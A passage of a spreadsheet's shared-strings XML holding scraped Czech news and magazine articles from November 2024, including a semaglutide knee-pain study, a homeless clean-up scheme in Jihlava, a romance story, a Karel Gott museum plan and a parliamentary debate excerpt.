    <t>3bc7c9c6fa29ec313acc</t>
  </si>
  <si>
    <t>Lék proti cukrovce Ozempic zmírňuje bolest kolenní artrózy, ukázala studie</t>
  </si>
  <si>
    <t>Lék proti cukrovce Ozempic zmírňuje bolest kolenní artrózy, ukázala studie Původně lék proti cukrovce by mohl pomoci kromě hubnutí i ke zmírnění bolesti. Podle nedávno zveřejněné klinické studie může aktivní látka v lécích Ozempic a Wegovy, určených původně pro léčbu diabetu a hubnutí, výrazně snižovat bolest kolenní artrózy u pacientů s obezitou. Výsledky studie, financované výrobcem léku Novo Nordisk , ukázaly, že pacienti zaznamenali téměř poloviční úlevu od bolesti oproti těm, kteří užívali placebo, píše zpravodajský server The Hill. Studie trvala 68 týdnů a zúčastnilo se jí 407 lidí, z nichž 82 procent byly ženy. Účastníci byli rozděleni do dvou skupin, přičemž jedna užívala aktivní látku semaglutid a druhá placebo. K měření bolesti vědci využili tzv. WOMAC index (Western Ontario and McMaster Universities Arthritis Index), který zahrnuje hodnocení bolesti, pohybových obtíží a funkčnosti při běžných činnostech, jako je chůze do schodů či sezení. Na začátku studie měla skupina účastníků průměrné skóre bolesti 70,9 bodu. Po 68 týdnech užívání semaglutidu se skóre snížilo na 29,2, zatímco u skupiny s placebem bylo 43,4. Skupina užívající semaglutid zaznamenala průměrnou redukci tělesné hmotnosti o 13,7 procenta, zatímco placebo skupina pouze o 3,2 procenta. „U pacientů s obezitou a kolenní artrózou s mírnou až těžkou bolestí vedla léčba jednou týdně injekčně podávaným semaglutidem k výraznějšímu snížení tělesné hmotnosti i bolesti než placebo,“ uvádí závěr studie. Podle Johns Hopkins Arthritis Center mají obézní ženy téměř čtyřikrát vyšší riziko vzniku kolenní artrózy oproti neobézním ženám. U mužů je toto riziko dokonce pětkrát vyšší. Deník The Hill píše, že semaglutid, který patří do skupiny GLP-1 agonistů, byl zkoumán nejen pro léčbu obezity a diabetu, ale i pro možné přínosy při léčbě závislostí, selhání ledvin, onemocnění jater či časných stádií Alzheimerovy choroby. PŘÍMO SOUVISÍ: Ozempic může pomoci závislým, tvrdí studie. Kromě cukrovky a hubnutí pomůže i v boji s alkoholem Nejedná se o první podobné zjištění, které se pojí s léky Ozempic či Wegovy, které mimo jiné pomáhají i při hubnutí. Podle studie z Lovola University Chicago, která se zabývá vlivem léků proti obezitě a cukrovce na alkoholiky a drogově závislé, by tyto léky mohly pomoci závislým v boji s opioidy a alkoholem . Výzkum naznačuje, že léky jako je Ozempic, Wegovy nebo Mounjaro, by mohly pomoci snížit míru předávkování opioidy u závislých a snížit intoxikaci alkoholem u alkoholiků. Studie byla publikována v odborném časopise Addiction, píše magazín DailyCaller.</t>
  </si>
  <si>
    <t>20241101_336_3243473571_c7e17bcfc035145f6fa1.html</t>
  </si>
  <si>
    <t>c7e17bcfc035145f6fa1</t>
  </si>
  <si>
    <t>V Jihlavě pomáhají s úklidem i lidé bez domova</t>
  </si>
  <si>
    <t>V Jihlavě pomáhají s úklidem i lidé bez domova Klienti Nízkoprahového denního centra a Noclehárny uklízejí hradby, okolí kostela svatého Jakuba nebo hřiště pod ulicí Hluboká. Za odměnu dostávají stravenky, které Středisku křesťanské pomoci darovalo město. Je přesně 17:00. Poznávám to podle odbíjení zvonu na kostele svatého Jakuba. Z Nízkoprahového denního centra v ulici Čajkovského vycházejí dva muži v oranžových vestách. „Dobrý den,“ zdraví nás s úsměvem. Oba si nesou velké fialové pytle a sběrače na odpadky. „Tak pojďte, začneme tady na hradbách,“ vedou nás a při tom už po cestě sbírají první papírky a plechovky z trávy. Jak se od nich s kolegou – fotografem dozvídáme, mezi klienty je v Nízkoprahovém denním centru o úklid zájem. „Střídáme se. Když má někdo zrovna peníze, nechá úklid někomu, kdo třeba v tu chvíli nemá nic. Dostáváme za něj totiž osmdesátikorunovou stravenku a někdy mi na ni vrátí třeba i šest nebo sedm korun. Ale kupujeme si za ni jen jídlo. Alkohol na ni vzít nejde,“ říká mi starší z mužů, který se jmenuje Ladislav. Přestože jdeme po hradbách podél obchodního centra sotva pět minut, fialový pytel už je z třetiny zaplněný. „Podívej, támhle pod keřem je nějaký papírek,“ ukazuje Ladislav svému mladšímu kolegovi Romanovi, zatímco on se jde podívat k jedné z laviček, kde leží igelitová taška. „Jo, tak v ní jsou prázdné plastové lahve,“ volá na nás. „Občas najdeme i lahve od piva a to jsou pak další koruny navíc, když je jdeme vrátit,“ říká mi Roman. „Ale co mě teda vytáčí, když najdeme někde ležet stříkačku. To přece ty lidi nemůžou myslet vážně a to bývají i u dětského hřiště,“ rozčiluje se. „Stříkačky ale nesbíráme, voláme k nám do centra a oni to nahlásí strážníkům,“ dodává už mírnějším hlasem. Z hradeb přecházíme přes hlavní silnici k obchodnímu centru a scházíme dolů po schodech do ulice Ztracená. „Tady je teda poházených kapesníků, to jste tady udělali vy?“ říká na půl z legrace Ladislav mladému páru, který tady posedává. „Ne ne, to už tady bylo,“ odpovídá dvojice a zvedá se k odchodu. Jsme venku asi 20 minut a chlapi mají igelitové pytle skoro plné. „A to kdybyste to viděli v pondělí, to bývá v ulicích ještě větší bordel. To nám pytle ani nestačí. Víte jak, po víkendu“ dodává Ladislav a spolu s kolegou míří uklidit ještě okolí kostela svatého Jakuba a nedaleké dětské hřiště pod ulicí Hluboká. Klienti Střediska křesťanské pomoci (SKP), které Nízkoprahové denní centrum a Noclehárnu v ulici Čajkovského provozuje, se na úklidu Jihlavy začali podílet už v 90. letech minulého století. S nápadem tehdy přišel bývalý ředitel Městské policie Jan Frenc. „Naše organizace tuto činnost zajišťovala s některými přestávkami nepřetržitě každý rok. Dlouhodobé výpadky nastaly v době pandemie SARS-Cov-2 a také v době stavebních prací, kdy byla budova v ulici Čajkovského uzavřena. Letos jsme se proto rozhodli, že úklidy znovu obnovíme,“ uvedl ředitel SKP David Chlupáček. Město je s pomocí klientů centra spokojené. „Za jejich opětovné zapojení do úklidu Jihlavy jsem opravdu rád. Tato činnost je prospěšná jak pro město, které je opět o něco čistší, tak pro klienty SKP, kteří mají možnost získat za užitečnou práci odměnu v podobě stravenky na jídlo. Věřím, že bude oboustranná spokojenost i nadále a budeme v této aktivitě pokračovat také v dalších obdobích," řekl primátor Jihlavy Petr Ryška . Zodpovídá: Bc. Lucie Maxová Vytvořeno / změněno: 1.11.2024 / 1.11.2024 Štítky dokumentu Sociální oblast Životní prostředí Zdravé město Hledaný výraz: Zodpovídá: v aktuálním kontextu (V Jihlavě pomáhají s úklidem i lidé bez domova) včetně podřízených složek dokumentů v dokumentech včetně archivu Datum od: Datum do:</t>
  </si>
  <si>
    <t>2200</t>
  </si>
  <si>
    <t>2410</t>
  </si>
  <si>
    <t>20241101_337_3264751015_ce8e0c0454f5547c9b24.html</t>
  </si>
  <si>
    <t>ce8e0c0454f5547c9b24</t>
  </si>
  <si>
    <t>Alkohol tester napoprvé takovou opilost nezměřil! Ochmelka měl přes pět promile</t>
  </si>
  <si>
    <t>Alkohol tester napoprvé takovou opilost nezměřil! Ochmelka měl přes pět promile Situaci, jakou nepamatují, zažili ve čtvrtek v pravé poledne brněnští strážníci. Dostali informaci, že se u tramvajové smyčce v Řečkovicích povaluje opilec (54). Když chtěla hlídka na místě provést dechovou zkoušku, přístroj vypověděl poslušnost. „Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile,“ vysvětlil mluvčí městské policie Jakub Ghanem. Opilce, kterého řidička s pomocí cestující odtáhla blízkosti kolejí, tak dostal po pauze šanci na reparát. To už na místě asistovali i zdravotníci. „Přístroj zobrazil extrémní hodnotu 5,38 promile, která pro nenavyklého člověka může být i smrtelná. Zdravotníci si muže převzali do své péče a po ošetření ho odvezli do nemocnice,“ dodal mluvčí. Ochmelka i tak neujde trestu. Je podezřelý z porušení takzvaného tabákového zákona, který zapovídá v opilosti pobyt na nástupišti hromadné dopravy. Ve správním řízení hrozí Brňanovi pokuta do 20 tisíc korun. VIDEO: Opilec jel na koloběžce Pisáreckým tunelem Autor: mat Autor person mat Rubrika transition_slide Brno - Krimi</t>
  </si>
  <si>
    <t>20241101_338_3242866220_1825ce3caea67e2ee603.html</t>
  </si>
  <si>
    <t>1825ce3caea67e2ee603</t>
  </si>
  <si>
    <t>Našla jsem lásku, až když jsem před ní utekla</t>
  </si>
  <si>
    <t>Našla jsem lásku, až když jsem před ní utekla Karla Pelikánová 1.11.2024 7 minut čtení Máma s tátou neustále říkali, že Libor není kluk pro mě. Připadal jim jako povrchní frajírek. Ale byla jsem zamilovaná, hluchá a slepá… Podzim a zima jsou pro nebožáka, který drží diety, něco jako mor. Pořád se něco slaví, a když se slaví, stoly se prohýbají pod tíhou lahůdek skládajících se z kalorických pokrmů a alkoholických nápojů. Zejména venkov je tím proslulý, vesničané v našem kraji si nesmírně zakládají na pohostinnosti. Přijde posvícení a s ním báječné koláče, na bílém koni přicválá svatý Martin a přiveze dozlatova vypečené husičky spolu s husí polévkou kaldoun a dezerty s jablky, hruškami a vlašskými ořechy. Je nad lidské síly držet dietu s pohledem na husu s knedlíkem a červeným zelím! Ale já jsem to všechno dokázala. Kvůli Liborovi. Kvůli němu bych se nejspíš naučila také létat anebo plynně mluvit a psát čínsky. Věděla jsem, že se mu líbí velice štíhlé dívky, a tak jsem se musela moc a moc snažit. Přitom štíhlost se v genetické výbavě celé naší široké rodiny nevyskytuje. Táta váží sto dvacet kilogramů a máma skoro metrák. Působí však daleko šťastnějším dojmem než hubeňouři. To je kočka Doma nebyli nadšení, že chodím s Liborem. Zatímco jsem se vznášela na růžovém obláčku, máma kroutila hlavou a táta se škaredil jako bouřkový mrak. „To není chlapec pro tebe, drahoušku,“ mínila máma. „Je to takový povrchní frajírek. Nerada vidím, že kvůli němu tak trpíš. Když byla pouť, ani ses nedotkla povidlových koláčů, a já dobře vím, že je zbožňuješ.“ Pokrčila jsem rameny: „Kdybych ztloustla, už bych se Liborovi nelíbila.“ To rozrušilo tátu, který zařval: „Takže Liborek si myslí, že hodnota člověka se měří podle toho, kolik váží kilogramů?“ Na to nebylo co říct, a tak jsem mlčela. Navíc mi v hlavě skutečně hlodal červíček pochybností. Máma měla pravdu. Libor byl frajírek. Jenomže láska je slepá a nedá se jí poroučet. A tak jsem hladověla natolik, že se mi občas točila hlava, div jsem neomdlela. „Koukni támhle na Romanu,“ povídá mi Libor a ukázal na naši atraktivní spolužačku. „To je kočka, co? Hele, a váží o dost míň než ty.“ To pro mě tenkrát byla ta pomyslná poslední kapka. Co se stalo? Rozbrečela jsem se, sbalila svých pět švestek a odjela z internátu domů do vsi uprostřed týdne, což jsem nikdy předtím neudělala. „Co se ti stalo?“ volal na mě Pepa, kluk ze sousedství. Štípal u nás dříví, vypomáhal tátovi, kterému vzhledem k jeho figuře dělaly některé chlapské práce potíže. „Nestarej se!“ zakvílela jsem a vlétla do náruče mámě. „Holčičko moje,“ pošeptala mi do ucha. „Že za to může ten bídák?“ Zavzlykala jsem a několikrát zoufale kývla hlavou. „Neříkala jsem to?“ zvolala máma vítězoslavně. „Je to povrchní sukničkář. Podívej támhle na Pepu. To je šikulka, panečku. Učí se lakýrníkem, pomáhá doma, pomáhá i nám. Hodný, charakterní kluk. Nemá motorku, beztak by mu ji doma nekoupili, nemají na rozhazování, nenosí brejle proti slunci ani koženou bundu. Mně se teda líbí, a moc.“ Rozkřikla jsem se: „Tak si ho, mami, vem!“ a utekla nahoru do svého pokojíčku. Mísa koláčů Utekla jsem před láskou. Máma zavolala do školy, že mám chřipku, a já jsem nahoře v pokojíčku brečela a koukala, jak venku přešlapuje babí léto, milé jako pohlazení. Taky tam Pepa rovnal dříví do úhledných hraniček. V duchu jsem uznala, že je fakticky pracovitý. Neuměla jsem si představit Libora rovnajícího dříví do úhledných hraniček. Zato si ho šlo lehce představit s cigaretou přilepenou k dolnímu rtu, s motorkou zvanou fichtl anebo jak divoce mlátí do klavíru. Případně jak s jiskrou v oku zírá na spolužačky, hlavně tedy na Romanu. Utřela jsem si slzy a vydala se na zahradu. „Ty jsi prej nemocná, říkala máma,“ hned mě oslovil Pepa . „Co ti je? A proč teda nemáš pyžamo?“ Odpověděla jsem, že pyžamo nepotřebuji, protože moje problémy jsou spíše duševního rázu. Než stačil dál vyzvídat, objevila se máma a nesla nám mísu posvícenských koláčů. Srdce se na ně smálo. Pepa je polykal skoro bez kousání, jako pes. Zavrtěla jsem hlavou, že nebudu. „Co blázníš?“ divil se s plnou pusou. „Jsou výborný.“ Namítla jsem, že nemůžu, kvůli linii. Divil se ještě víc: „Jak to? Figuru máš skvělou.“ Věř Pepovi Skoro jsem spadla z lavičky. To mi ještě nikdy nikdo neřekl, mimo rodičů, a ti se nepočítají. „Vidíš?“ zářila máma. „Věř Pepovi. Figuru máš skvělou.“ Tonula jsem v rozpacích, ale cítila jsem se najednou nekonečně šťastná. Váhavě jsem se natáhla pro koláč s povidly a pak pro další, jablečný. Chutnaly jako pozdrav z ráje. Bylo mi najednou tak dobře, že jsem úplně zapomněla, že utíkám před láskou. Pomáhala jsem Pepovi rovnat dříví na zimu a na Libora si ani jednou nevzpomněla. A když jsem si na něj konečně vzpomněla, cítila jsem se skoro až provinile. Vždyť je to můj kluk. Proč na něj nemyslím? Pepa navrhl, že bychom mohli společně v hospodě připravovat sál na sobotní posvícenskou tancovačku, a tak jsme zdobili stoly umělými květinami a rozvěšovali ozdoby z krepového papíru. Dost jsme se u toho nasmáli. Když mě pak za šera doprovázel domů, povídá: „Hele. Ty prej s někým ve městě chodíš.“ Nevěděla jsem, co na to odpovědět, ta otázka byla trefou do černého. Jak to vlastně mám? Po delší pauze jsem jen pokrčila rameny. „Divná odpověď,“ mrzutě poznamenal Pepa a pustil se úzkou silničkou lemovanou lampami k domovu. Tlustá Libor přijel na motorce. V sobotu odpoledne zazvonil a divil se, proč jsem tak najednou utekla. Vůbec nepochopil, že to bylo kvůli té jeho poznámce o Romaně, nedošlo mu, že byla nevhodná. Máma ho pozvala do kuchyně na koláče. Jakmile jsem se do jednoho zakousla, nesouhlasně zakroutil hlavou. Potom jsem se vypravovala na tu posvícenskou zábavu, a když jsem se mu přišla ukázat ve svých nejlepších šatech, ušila je máma, opět zavrtěl odmítavě hlavou: „Ty si neber. Vypadají, jako bys je zdědila po tetě. A jsi v nich tlustá.“ Do očí mi vstoupily slzy. Měla jsem po náladě. Radši jsem si vzala sukni. Na druhou stranu bylo povzbudivé, jak všechny holky koukaly. Zavěsila jsem se do Libora a byla jsem pyšná, protože vypadal jako z filmového plátna. „Jak se ti ho povedlo sbalit?“ šeptala mi kámoška. Pepa koukal jinam a bavil se s kluky. Ale dobře jsem si všimla, že ho to mrzí. Ani pivo „Radši nepij,“ napomínala jsem Libora. „Jedeš domů na motorce.“ Vysmál se mi: „Ale prosím tě, je to jen pár kilometrů. Co by to bylo za tancovačku, kdybych si nemohl dát ani pivo ?“ Lil to do sebe zlatavý mok jako vodu. Potom se zeptal, zdali mi nebude vadit, když vyzve k tanci támhletu copatou holku. Byla to vyhlášená krasavice Michaela, s níž chodil zdejší výčepní. Než jsem mu tu podstatnou informaci stačila povědět, domotal se k Míše a táhl ji nekompromisně na parket. Nechtěla, bránila se, samozřejmě okamžitě přiběhl výčepní a dal Liborovi pěstí. Nebyl to tenkrát moc hezký večer, a Libor ho zakončil tak, že sedl na motorku, chystal se zmizet, aniž tušil, že za rohem číhá místní čilý policista na právě takové výtečníky, co se ze zábavy nerozpakují jet po vlastní ose. Libor měl tedy špatný den. Ale já už tedy rozhodně ne. Zbytek večera jsem totiž strávila s Pepou a i s některými dalšími kamarády. Přisedla si k nám copatá Michaela, povídá: „Cos to proboha přivedla za pitomce?“ S pohledem na dobráckého Pepu jsem vyhrkla: „Ale já už s ním nechodím.“ Pepa to zaznamenal rád. Usmál se. Od té chvíle se začal psát příběh naší lásky, a dnes je z něj pořádně obsáhlý román. Miroslava (63), jižní Morava Předchozí článek Druhou šanci jsme si zasloužili… 6.11.2024 K našemu velkému překvapení jsem porodila dvojčata. Po půl roce manžel neunesl starost o dvě uplakané dcery a utekl. Sice jsem měla břicho jako sud a sotva chodila, ale jinak jsem celé těhotenství zvládala dobře. Měsíc před termínem se mi císařským řezem narodily děti. K mému šoku dvě. Po celou dobu v porodnici jsem přemýšlela nad systémem, se kterým zvládnu péči o dvě holčičky. Sice mi bylo už Kristýnka spojila dvě osamělé duše 3.11.2024 Můj soused mi připadal jako pěkný protiva, zato jeho dcera byla andílek. Dobře poznala, jak osamělá jsem, a vždy se se mnou chtěla dát do řeči. Táta jí v tom bránil, pak mě ale sám oslovil... V tom bytě po rodičích jsem bydlela od dětství. Získala jsem ho ve chvíli, kdy jsem se provdala za Jáchyma. Znala jsem ho od školky a už v první třídě jsme spolu chodili za ručičku. Naše první láska nám vy Láska na nečekaném místě… 25.10.2024 Syn se ženil, a tak mě pozval, abych se seznámila s jeho nastávající ženou a její rodinou. Ta cesta na venkov mi změnila život. Sháněla jsem muže všude možně, tolik jsem se po rozvodu bála osamělosti. Jenže vhodní muži jakoby došli. Až jsem jednoho dne přijela na místo, kde bych lásku vůbec nehledala. A byla jsem moc mile překvapena. Nepříjemný rozvod Můj rozvod s Jaroslavem byl poměrně d Těžkou zkoušku jsme už zvládli 25.10.2024 Ve složité chvíli jsme nezůstali sami. Na pomoc přispěchaly naše děti, i když jsme měli mnohé spory. Blízkost smrti nás semkla zase v rodinu. Vdávala jsem se z lásky a za svým manželem jsem odešla daleko od své rodiny. Záhy se nám narodily děti. Můj muž měl v tu dobu nastartovanou skvělou kariéru právníka. Obětovala jsem se ráda. Přerušila jsem studium medicíny a nastoupila do nemocnice jako zd Jak dovolená změnila můj život 20.10.2024 Když jsem chodila do první třídy, nastěhovala se do našeho domu rodina s malým synem. Tomík chodil do třetí třídy a nejvíce se kamarádil se mnou. Synovi našich nových sousedů jsem se líbila už tenkrát. Pamatuji si, že když jsme si s mojí sestřenicí a Tomíkem u nás hráli, můj kamarád řekl, že až budeme velcí, vezme si mě za ženu. Když mi bylo deset let, rodiče se rozvedli a největší rána pro mě Autor: Karla Pelikánová Autor person Karla Pelikánová Rubrika transition_slide Láska</t>
  </si>
  <si>
    <t>20241101_339_3242836158_04d6a48884d1a14c5e40.html</t>
  </si>
  <si>
    <t>04d6a48884d1a14c5e40</t>
  </si>
  <si>
    <t>Vliv pravidelné chůze na plodnost: Přínosy pro pánevní dno, psychiku i kvalitu spermií</t>
  </si>
  <si>
    <t>Vliv pravidelné chůze na plodnost: Přínosy pro pánevní dno, psychiku i kvalitu spermií Chůze je nejen skvělým způsobem, jak se udržet ve formě a zlepšit fyzickou kondici, ale její vliv sahá mnohem dál. Pravidelné procházky mají pozitivní dopady na plodnost, především na kvalitu spermií u mužů, podporují pevnost pánevního dna a prospívají psychice. Jak může chůze přispět k plodnosti a jaký má vliv na zdraví mužů a žen? Lepší kvalita spermií díky pravidelné chůzi Muži, kteří chtějí zvýšit kvalitu spermií, by se měli zaměřit nejen na zdravou stravu a omezení alkoholu , kofeinu a nikotinu, ale také na pravidelný pohyb. Svižná chůze je fyzickou aktivitou, která je dostupná prakticky každému, včetně těch, kteří mají nadváhu nebo s cvičením teprve začínají. Ideální je věnovat se svižné chůzi třikrát až čtyřikrát týdně po dobu 45 minut. Při takovém tempu dochází ke zvýšené tvorbě testosteronu, což je klíčový hormon pro tvorbu spermií. „ Bylo prokázáno, že mírná fyzická aktivita podporuje produkci testosteronu, což zvyšuje množství i pohyblivost spermií, “ uvádí MUDr. Martin Maděrka, odborník na asistovanou reprodukci z kliniky REPROMEDA. Pravidelná svižná chůze tedy může zlepšit kondici spermií a podpořit mužskou plodnost. Chůze jako pomocník při odbourávání stresu Stres je jedním z hlavních faktorů, které mohou negativně ovlivnit plodnost. Kortizol a adrenalin, hormony vyplavované během stresu, mohou v dlouhodobém horizontu narušit hormonální rovnováhu a blokovat ovulaci. Stres také snižuje hladinu testosteronu a kvalitu spermií. Pravidelné procházky v přírodě napomáhají vyplavování endorfinů, které zlepšují náladu, odbourávají stres a přispívají k lepšímu spánku. Pravidelná chůze tak pomáhá zmírňovat stres a podporuje psychickou pohodu, což má pozitivní vliv na celkovou plodnost. „ Při procházce se zklidníme, snížíme napětí a vytvoříme si prostor pro duševní odpočinek, což následně může prospět i našim reprodukčním funkcím, “ říká doktor Maděrka. Podpora správné polohy pánve a posílení pánevního dna Každodenní chůze má příznivý vliv na držení těla a posilování svalů, včetně svalů pánevního dna, které mají zásadní význam pro plodnost. „ Špatné držení těla může vést k nesprávné poloze pánve, což nepříznivě ovlivňuje pánevní svaly a může snižovat prokrvení reprodukčních orgánů, “ vysvětluje doktor Maděrka. Posílení pánevního dna přispívá k lepšímu prokrvení pánevní oblasti, což podporuje zdravé fungování reprodukčních orgánů. Správně fungující svaly pánevního dna jsou také důležité pro ženy během těhotenství a porodu. Silné pánevní dno může pomoci předejít inkontinenci během těhotenství a přispět k hladšímu průběhu porodu. Boj proti obezitě a podpora plodnosti Obezita je dalším faktorem, který může výrazně snižovat plodnost. Podle statistik je v České republice obézní přibližně pětina populace, což s sebou přináší řadu zdravotních rizik, včetně rizika snížené plodnosti. „ Obezita vytváří v těle stav chronického zánětu, který negativně ovlivňuje krevní tlak, metabolismus a hormonální rovnováhu, “ upozorňuje doktor Maděrka. Světová zdravotnická organizace ( WHO ) doporučuje jako prostředek pro redukci váhy právě pravidelnou chůzi. Ideální je svižná chůze v tempu, které je dostatečně intenzivní na to, aby člověk zadýchal, ale stále zvládl mluvit. Taková aktivita může pomoci nejen při redukci váhy, ale také podpořit hormonální rovnováhu, která je velmi důležitá pro zdravou reprodukci. Zaujal vás článek? Podělte se o něj s přáteli: Lidé se dožívají stále vyššího věku a ženy vypadají v padesáti letech snad ještě lépe než kdysi ve třiceti. Vzrůstá O Autorovi Redakce Připravujeme pro vás nové články a zajímavosti ze světa zdravého životního stylu. Pokud byste chtěli zveřejnit v našem magazínu váš článek nebo máte zájem o inzerci, můžete nás kontaktovat. Autor: Redakce Rubrika transition_slide PR</t>
  </si>
  <si>
    <t>32</t>
  </si>
  <si>
    <t>210</t>
  </si>
  <si>
    <t>20241101_34_3264560107_393abac299adf1afe9b3.html</t>
  </si>
  <si>
    <t>393abac299adf1afe9b3</t>
  </si>
  <si>
    <t>Gottová s dcerami vyměnila Bertramku za moderní dům za 68 milionů. Mistrova vila ale prázdná nezůstane</t>
  </si>
  <si>
    <t>Gottová s dcerami vyměnila Bertramku za moderní dům za 68 milionů. Mistrova vila ale prázdná nezůstane close Profimedia / Profimedia Eva Pivoňková 1. 11. 2024 clock 3 minuty Vdova po Karlu Gottovi Ivana se i s dcerami rozhodla odstěhovat z vily v ulici Nad Bertramkou . Pořídila na svou firmu luxusní řadovku na pražském Smíchově . Gottova vila ale prázdná nezůstane. Ivana v ní hodlá udělat zpěvákovo muzeum. Ivana Gottová se pět let po smrti Karla Gotta rozhodla jeho milovanou vilu opustit. Pořídila si novostavbu, která nepůsobí nijak přepychově, ale přišla na 68 milionů korun. Stěhovat by se měla už brzy. Slavná vila na Bertramce zoom_in Vila na Bertramce Karel Gott žil ve vile na Bertramce od roku 1974. O 30 let později se do ní nastěhovala Ivana Macháčková , kterou si později Karel Gott vzal za manželku. V domě spolu vychovávali dcery Charlotte a Nelly. Nyní se Ivana rozhodla i s dcerami změnit adresu. Nestěhuje se nikam daleko. Nový řadový dům si pořídila poblíž parku Ladronka na Smíchově . Na Císařce koupila novostavbu. Moderní bydlení zoom_in Vila Ivany Gottové v Císařské ulici v Praze Třípodlažní vila je dispozičně 5+kk a stojí na pozemku, který má přibližně 1 000 metrů čtverečních. Dům se stane součástí nově zbudované ulice Císařská vinice. Dům dostal jméno Malbec, a to podle odrůdy červeného vína . Ivana a její dcery se mohou těšit na moderní bydlení na 305 metrech čtverečních obytné plochy. Dům je koncipovaný jako mimořádně úsporný, takže náklady budou velmi rozumné. V přízemí je prostorný obývací pokoj s kuchyňským koutem. Ve stejné úrovni je pak také dvojgaráž se speciálními místy pro kola. Najdete zde také toaletu a pracovnu. O patro výše jsou pak tři ložnice s koupelnou a toaletami. Nechybí samozřejmě ani suterén, kde je místo pro dílnu, toaletu a technické zázemí. Venku je pak obří terasa, která volně přechází v zahradu. Skvělá poloha By VitVit - Own work, CC BY-SA 4.0 / Wikimedia Commons zoom_in Park Ladronka Výhodou nového domu není jen moderní interiér, ale také perfektní poloha. Blízko je park Ladronka, kde je nejdelší osvětlená in-line dráha v Praze a kde se koná i největší volnočasový festival ve střední Evropě , Ladronkafest. Úžasná moderní roubenka Karla Gotta : Svou luxusní chalupu v Doubicích zpěvák miloval. Teď zeje prázdnotou video Daleko není ani oblíbené nákupní centrum Anděl, kde je kromě obchodů i řada restaurací či kino. A pokud si bude chtít Ivana vyrazit do přírody, může si zajít třeba do nedaleké přírodní rezervace Skalka. Gottovo muzeum Vila na Bertramce ale po odchodu Ivany Gottové a jejích dcer ladem nezůstane. Dům, který se nachází v jedné z nejkrásnějších pražských lokalit, se promění v Gottovo muzeum. Otevře se tedy všem fanouškům, kteří našeho slavného zpěváka milovali. Extravagantní cihlová vila Tomia Okamury na Břevnově : V “tubusovém“ domě je 39 místností ve 3 bytech video Obdivovat budou moci nejen nádherný interiér či úchvatný výhled z terasy na Hradčany , ale i 42 zpěvákových slavíků, zlaté, platinové, diamantové desky, které během kariéry získal, i další cenné trofeje. K vidění budou také Gottovy nejmilejší starožitné kousky. Prohlédnout si budou moci také obrazy, které Karel Gott maloval. Muzeum by mohlo své první návštěvníky přivítat už příští rok na jaře. Sledujte nás v Google Zprávách Newsletter Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. Doporučené články Autoři · Redakce · RSS Newsletter Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. vlm Copyright © VLTAVA LABE MEDIA a.s. všechna práva vyhrazena Publikování, šíření nebo jakékoliv jiné užití obsahu pro jiné než osobní účely uživatele, je bez písemného souhlasu VLTAVA LABE MEDIA a.s. zakázáno. Toto ustanovení platí také pro RSS kanály a jejich obsah. Přihlášení Rádi bychom znali důvod proč se nechcete přihlásit. Odběr newsletteru Chcete pravidelně dostávat výběr nejlepších článků na Váš e-mail? Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. Skutečně se chcete odhlásit?</t>
  </si>
  <si>
    <t>172150</t>
  </si>
  <si>
    <t>80180</t>
  </si>
  <si>
    <t>20241101_340_3247791633_75cc552b01b933684337.html</t>
  </si>
  <si>
    <t>75cc552b01b933684337</t>
  </si>
  <si>
    <t>PČR, PS 2021-..., 117. schůze, část 23 (1. 11. 2024)</t>
  </si>
  <si>
    <t>PČR, PS 2021-..., 117. schůze, část 23 (1. 11. 2024) Neprošlo jazykovou korekturou, neautorizováno! Pátek 1. listopadu 2024 Minulý Dolů Další (10.00 hodin) (pokračuje Hubert Lang ) Vám je to jedno. Vy jste si prostě něco vytyčili, vy si něco prosazujete - a paradoxně, prosím vás, prosazuje to strana, která má dvě až tři procenta voličských preferencí, to znamená, úplně marginální strana, kterou prakticky kromě rodinných příslušníků (nesrozumitelné) vůbec (nikdo?). Jestliže vy, pane ministře, jste tou novou krví KDU-ČSL, tak to tedy chraň nás ruka Páně - nebo ty vaše poslední voliče tedy. Já jsem sledoval váš sjezd. Sledoval jsem, co jste osmadvacátého října vystoupili ve vaší koalici (Spolu), kdy jste se tam zavázali, že povedete další čtyři roky s panem Fialou a s další koaličním partnerem tuto zemi. Tak to tedy opravdu, vážení voliči, jestli tato skupina politiků povede ještě čtyři roky tuto zemi, tak už nebude máslo za 80 korun - máslo už vůbec nebude. Já tady musím skákat z hrušky na švestku, protože to není možné. Co se tady děje. Prostě vy nám dáte pevné hlasování příští pátek, je vám to úplně jedno, jaké tady budou padat argumenty, ale vy si něco svého prosadíte. Něco, co my jsme tady jasně řekli, že když zvítězíme příští rok ve volbách, že vám to hodíme na hlavu, protože to je takový paskvil, který tady už dlouho nebyl. Děkuji. Místopředseda PSP Aleš Juchelka : Já také děkuji za dodržení času. V tuto chvíli pan ministr Výborný , po něm paní poslankyně Zuzana Ožanová . Pane ministře, vaše dvě minuty. Ministr zemědělství ČR Marek Výborný : Děkuji. Čtyři poslední faktické poznámky. K panu poslanci Brázdilovi. Vaše slova o Bohu svědčí o vás samotném. K paní poslankyni Pastuchové. Děkuju za to, děkuju za výzvu k racionální debatě založené na pravdivých slovech. Prosím, paní poslankyně, páni poslanci - hlavně z hnutí ANO, vezměte si to k srdci. Tohle podepisuji, slova paní poslankyně tesat do kamene. Třetí poznámka, k paní poslankyni Balaštíkové. Tak ještě jednou, trochu edukace. Jsem ministr zemědělství, nejsem ministr cenotvorby. Fakt nebudu pískat souboj mezi potravináři a obchodníky. Štve mě to velmi, ale opravdu, jestli máte pocit, že na Ministerstvu zemědělství ráno určuji, za kolik bude máslo nebo mléko nebo chleba, tak fakt neurčuji. Čtvrtá, poslední poznámka, k panu poslanci Babišovi. Buďte si jist, že poznám nejenom krávy, ale taky voly. (Smích, potlesk zprava.) Děkuji. Místopředseda PSP Aleš Juchelka : Já děkuji za dodržení času. V tuto chvíli paní kolegyně Ožanová . Prosím, vaše dvě minuty. Poslankyně Zuzana Ožanová : Děkuji. Vážený pane místopředsedo, kolegyně, kolegové, já jsem přišla s takovou klidnou poznámkou a nevím, jak teď reagovat. Pane předsedající, možná jste měl kolegu napomenout. Já, když jsem tady mluvila kdysi - nedávno o kydání hnoje, tak mě hned opravili. Měli jsme možná upozornit pana 